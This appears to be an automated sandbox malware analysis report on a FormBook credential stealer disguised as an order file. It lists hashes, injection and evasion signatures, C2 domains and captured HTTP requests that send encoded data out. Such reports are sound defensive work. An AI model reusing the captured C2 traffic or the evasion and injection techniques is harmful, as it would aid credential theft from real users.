Windows Analysis Report
Order SO311180.exe

Overview

General Information

Sample name: Order SO311180.exe
Analysis ID: 1545977
MD5: 41886bf229bc21ea268c47f9de85abb2
SHA1: 9b1231e42b6bd7b0abbc47a080293dab2419868d
SHA256: cc3fe65f9d8dc99dd62570dbc56059d89d93676f54ec85b40e4f7f109469a2a7
Tags: exeuser-lowmal3
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign process
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection

Source: Order SO311180.exe ReversingLabs: Detection: 52%
Source: Yara match File source: 3.2.Order SO311180.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Order SO311180.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.3419404921.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2685441163.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3420187302.0000000001280000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3421857205.0000000004E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3421923997.0000000004E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2685875397.0000000001380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3421898529.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2688650514.0000000001BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: Order SO311180.exe Joe Sandbox ML: detected
Source: Order SO311180.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Order SO311180.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: EhStorAuthn.pdbGCTL source: Order SO311180.exe, 00000003.00000002.2685987048.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, GfSuWuMUukRRDP.exe, 00000006.00000003.2630488308.0000000000B6B000.00000004.00000020.00020000.00000000.sdmp, GfSuWuMUukRRDP.exe, 00000006.00000002.3420777214.0000000000B87000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: GfSuWuMUukRRDP.exe, 00000006.00000002.3420506622.0000000000AAE000.00000002.00000001.01000000.0000000C.sdmp, GfSuWuMUukRRDP.exe, 00000008.00000000.2764840219.0000000000AAE000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: wntdll.pdbUGP source: Order SO311180.exe, 00000003.00000002.2686263558.0000000001850000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000007.00000003.2688036889.0000000004E16000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000007.00000002.3422073850.000000000515E000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000007.00000002.3422073850.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000007.00000003.2685808951.0000000004C64000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Order SO311180.exe, Order SO311180.exe, 00000003.00000002.2686263558.0000000001850000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, EhStorAuthn.exe, 00000007.00000003.2688036889.0000000004E16000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000007.00000002.3422073850.000000000515E000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000007.00000002.3422073850.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000007.00000003.2685808951.0000000004C64000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: EhStorAuthn.pdb source: Order SO311180.exe, 00000003.00000002.2685987048.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, GfSuWuMUukRRDP.exe, 00000006.00000003.2630488308.0000000000B6B000.00000004.00000020.00020000.00000000.sdmp, GfSuWuMUukRRDP.exe, 00000006.00000002.3420777214.0000000000B87000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_030BC270 FindFirstFileW,FindNextFileW,FindClose, 7_2_030BC270
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 4x nop then xor eax, eax 7_2_030A9DA0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 4x nop then mov ebx, 00000004h 7_2_053104E8
Source: Joe Sandbox View IP Address: 52.20.84.62 52.20.84.62
Source: Joe Sandbox View IP Address: 3.33.130.190 3.33.130.190
Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.6:49767
Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.6:49933
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /4d7f/?yvsLS=4RrPNjhX4v&8XCl=GYb0rmyr/JAlLZNhnt/PbSIY/4LKqg5t8esebmIUXrwcEcXD+HGwSEbbxHn9xefIHUHI8DRuA6hSDuYZVaPcTdApV0AY1UFCgokq6TFyr/YFpy4hrd6Qy8FR+WKPf+6hCwHCnkk= HTTP/1.1Host: www.trifecta.centerAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
Source: global traffic HTTP traffic detected: GET /qfwu/?8XCl=6fCxb2xLzjzF4nD7KjQhWEUB1Dc/xE2Ac7kR0Mi0XoRopjw7HNNCf6pSJ3AnVDHsLPCXmSmdJmWxpgfBXwwA5t6gIQ/Cna8saLmgT8gs4Z7leSM87MtPn4jvikK4JHq2+PAUNMc=&yvsLS=4RrPNjhX4v HTTP/1.1Host: www.seraph.bestAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
Source: global traffic HTTP traffic detected: GET /o5fg/?8XCl=5onoMf6BmQl2QeVt/VrvVQYA8O/0+XqHKAgaJU0renyYnLBIrjMEkLORFTCyyhU0JhHfx4R92TWl4c733/RJZ98SsCn0nC0Ik21bS5JVWHE+LkgK3JQJVh0EnUQYNAjBF31c1vc=&yvsLS=4RrPNjhX4v HTTP/1.1Host: www.owinvip.netAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
Source: global traffic HTTP traffic detected: GET /9rsa/?8XCl=MJaEnwMoptGuAyQmB3iPl7F+p8qtmKUBGuoMdJ29iBxpANTscusPMMCgTv6bu6SX3cIivBJkXrMlI2rZEQxlKspg1QaKZCcrVeHixY1fXHhPEmgxmVDDzfXQ8vDPmCD1H+z4LW8=&yvsLS=4RrPNjhX4v HTTP/1.1Host: www.thefokusdong43.clickAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
Source: global traffic DNS traffic detected: DNS query: www.trifecta.center
Source: global traffic DNS traffic detected: DNS query: www.seraph.best
Source: global traffic DNS traffic detected: DNS query: www.owinvip.net
Source: global traffic DNS traffic detected: DNS query: www.thefokusdong43.click
Source: unknown HTTP traffic detected: POST /qfwu/ HTTP/1.1Host: www.seraph.bestAccept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brOrigin: http://www.seraph.bestReferer: http://www.seraph.best/qfwu/Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheContent-Length: 209Connection: closeUser-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0Data Ascii: 8XCl=3dqRYCJm0jjQynXhJSJTCxsOzgIH3nSIWZ0I1MPgW51O0SI1Fd16IPJoM1sELSDzcfmQih6OHXKprSbKTCNrjciXPzr5kZ8iCa+VU7UI7Jm6OTcmxudzq/PB1yenLUGoo+NXcKhXBL7rs6t76FHN6e41bTLDLmJ9lmPaP2xmjtrAUCzs+H9dJxiKvlZgji3jOx5iBJT5FFbL
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 31 Oct 2024 10:06:21 GMTserver: LiteSpeedData Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 31 Oct 2024 10:06:23 GMTserver: LiteSpeedData Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 31 Oct 2024 10:06:26 GMTserver: LiteSpeedData Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 31 Oct 2024 10:06:28 GMTserver: LiteSpeedData Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: EhStorAuthn.exe, 00000007.00000002.3422809473.0000000005C16000.00000004.10000000.00040000.00000000.sdmp, GfSuWuMUukRRDP.exe, 00000008.00000002.3422059437.00000000037E6000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.seraph.best/
Source: GfSuWuMUukRRDP.exe, 00000008.00000002.3420187302.00000000012E0000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.thefokusdong43.click
Source: GfSuWuMUukRRDP.exe, 00000008.00000002.3420187302.00000000012E0000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.thefokusdong43.click/9rsa/
Source: EhStorAuthn.exe, 00000007.00000002.3425079533.0000000008238000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: EhStorAuthn.exe, 00000007.00000002.3425079533.0000000008238000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: EhStorAuthn.exe, 00000007.00000002.3425079533.0000000008238000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: EhStorAuthn.exe, 00000007.00000002.3425079533.0000000008238000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: EhStorAuthn.exe, 00000007.00000002.3425079533.0000000008238000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: EhStorAuthn.exe, 00000007.00000002.3425079533.0000000008238000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: EhStorAuthn.exe, 00000007.00000002.3425079533.0000000008238000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: EhStorAuthn.exe, 00000007.00000002.3419665811.0000000003389000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: EhStorAuthn.exe, 00000007.00000002.3419665811.0000000003389000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: EhStorAuthn.exe, 00000007.00000003.2882271865.0000000008228000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: EhStorAuthn.exe, 00000007.00000002.3419665811.0000000003389000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: EhStorAuthn.exe, 00000007.00000002.3419665811.0000000003389000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: EhStorAuthn.exe, 00000007.00000002.3419665811.0000000003389000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: EhStorAuthn.exe, 00000007.00000002.3419665811.0000000003389000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: EhStorAuthn.exe, 00000007.00000002.3425079533.0000000008238000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/

E-Banking Fraud

Source: Yara match File source: 3.2.Order SO311180.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Order SO311180.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.3419404921.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2685441163.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3420187302.0000000001280000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3421857205.0000000004E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3421923997.0000000004E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2685875397.0000000001380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3421898529.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2688650514.0000000001BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: initial sample Static PE information: Filename: Order SO311180.exe
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C62294 NtQueryInformationProcess, 0_2_06C62294
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C6630B NtQueryInformationProcess, 0_2_06C6630B
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0042C653 NtClose, 3_2_0042C653
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2B60 NtClose,LdrInitializeThunk, 3_2_018C2B60
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2DF0 NtQuerySystemInformation,LdrInitializeThunk, 3_2_018C2DF0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2C70 NtFreeVirtualMemory,LdrInitializeThunk, 3_2_018C2C70
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C35C0 NtCreateMutant,LdrInitializeThunk, 3_2_018C35C0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C4340 NtSetContextThread, 3_2_018C4340
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C4650 NtSuspendThread, 3_2_018C4650
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2B80 NtQueryInformationFile, 3_2_018C2B80
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2BA0 NtEnumerateValueKey, 3_2_018C2BA0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2BE0 NtQueryValueKey, 3_2_018C2BE0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2BF0 NtAllocateVirtualMemory, 3_2_018C2BF0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2AB0 NtWaitForSingleObject, 3_2_018C2AB0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2AD0 NtReadFile, 3_2_018C2AD0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2AF0 NtWriteFile, 3_2_018C2AF0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2DB0 NtEnumerateKey, 3_2_018C2DB0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2DD0 NtDelayExecution, 3_2_018C2DD0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2D00 NtSetInformationFile, 3_2_018C2D00
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2D10 NtMapViewOfSection, 3_2_018C2D10
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2D30 NtUnmapViewOfSection, 3_2_018C2D30
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2CA0 NtQueryInformationToken, 3_2_018C2CA0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2CC0 NtQueryVirtualMemory, 3_2_018C2CC0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2CF0 NtOpenProcess, 3_2_018C2CF0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2C00 NtQueryInformationProcess, 3_2_018C2C00
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2C60 NtCreateKey, 3_2_018C2C60
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2F90 NtProtectVirtualMemory, 3_2_018C2F90
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2FA0 NtQuerySection, 3_2_018C2FA0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2FB0 NtResumeThread, 3_2_018C2FB0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2FE0 NtCreateFile, 3_2_018C2FE0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2F30 NtCreateSection, 3_2_018C2F30
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2F60 NtCreateProcessEx, 3_2_018C2F60
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2E80 NtReadVirtualMemory, 3_2_018C2E80
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2EA0 NtAdjustPrivilegesToken, 3_2_018C2EA0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2EE0 NtQueueApcThread, 3_2_018C2EE0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2E30 NtWriteVirtualMemory, 3_2_018C2E30
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C3090 NtSetValueKey, 3_2_018C3090
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C3010 NtOpenDirectoryObject, 3_2_018C3010
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C39B0 NtGetContextThread, 3_2_018C39B0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C3D10 NtOpenProcessToken, 3_2_018C3D10
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C3D70 NtOpenThread, 3_2_018C3D70
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05034650 NtSuspendThread,LdrInitializeThunk, 7_2_05034650
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05034340 NtSetContextThread,LdrInitializeThunk, 7_2_05034340
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032D10 NtMapViewOfSection,LdrInitializeThunk, 7_2_05032D10
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032D30 NtUnmapViewOfSection,LdrInitializeThunk, 7_2_05032D30
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032DD0 NtDelayExecution,LdrInitializeThunk, 7_2_05032DD0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032DF0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_05032DF0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032C60 NtCreateKey,LdrInitializeThunk, 7_2_05032C60
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032C70 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_05032C70
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032CA0 NtQueryInformationToken,LdrInitializeThunk, 7_2_05032CA0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032F30 NtCreateSection,LdrInitializeThunk, 7_2_05032F30
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032FB0 NtResumeThread,LdrInitializeThunk, 7_2_05032FB0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032FE0 NtCreateFile,LdrInitializeThunk, 7_2_05032FE0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032E80 NtReadVirtualMemory,LdrInitializeThunk, 7_2_05032E80
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032EE0 NtQueueApcThread,LdrInitializeThunk, 7_2_05032EE0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032B60 NtClose,LdrInitializeThunk, 7_2_05032B60
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032BA0 NtEnumerateValueKey,LdrInitializeThunk, 7_2_05032BA0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032BE0 NtQueryValueKey,LdrInitializeThunk, 7_2_05032BE0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 7_2_05032BF0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032AD0 NtReadFile,LdrInitializeThunk, 7_2_05032AD0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032AF0 NtWriteFile,LdrInitializeThunk, 7_2_05032AF0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050335C0 NtCreateMutant,LdrInitializeThunk, 7_2_050335C0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050339B0 NtGetContextThread,LdrInitializeThunk, 7_2_050339B0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032D00 NtSetInformationFile, 7_2_05032D00
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032DB0 NtEnumerateKey, 7_2_05032DB0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032C00 NtQueryInformationProcess, 7_2_05032C00
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032CC0 NtQueryVirtualMemory, 7_2_05032CC0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032CF0 NtOpenProcess, 7_2_05032CF0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032F60 NtCreateProcessEx, 7_2_05032F60
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032F90 NtProtectVirtualMemory, 7_2_05032F90
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032FA0 NtQuerySection, 7_2_05032FA0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032E30 NtWriteVirtualMemory, 7_2_05032E30
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032EA0 NtAdjustPrivilegesToken, 7_2_05032EA0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032B80 NtQueryInformationFile, 7_2_05032B80
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032AB0 NtWaitForSingleObject, 7_2_05032AB0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05033010 NtOpenDirectoryObject, 7_2_05033010
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05033090 NtSetValueKey, 7_2_05033090
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05033D10 NtOpenProcessToken, 7_2_05033D10
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05033D70 NtOpenThread, 7_2_05033D70
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_030C8FC0 NtDeleteFile, 7_2_030C8FC0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_030C8ED0 NtReadFile, 7_2_030C8ED0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_030C8D60 NtCreateFile, 7_2_030C8D60
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_030C91D0 NtAllocateVirtualMemory, 7_2_030C91D0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_030C9060 NtClose, 7_2_030C9060
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_00BAEF04 0_2_00BAEF04
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_04CC0040 0_2_04CC0040
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_04CC003F 0_2_04CC003F
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C63658 0_2_06C63658
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C62388 0_2_06C62388
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C69D60 0_2_06C69D60
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C63653 0_2_06C63653
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C65720 0_2_06C65720
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C66490 0_2_06C66490
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C652E8 0_2_06C652E8
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C6237B 0_2_06C6237B
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C68E43 0_2_06C68E43
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C68E48 0_2_06C68E48
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C69FE3 0_2_06C69FE3
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C69FF0 0_2_06C69FF0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C69D50 0_2_06C69D50
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C65BE0 0_2_06C65BE0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_0E1F6C68 0_2_0E1F6C68
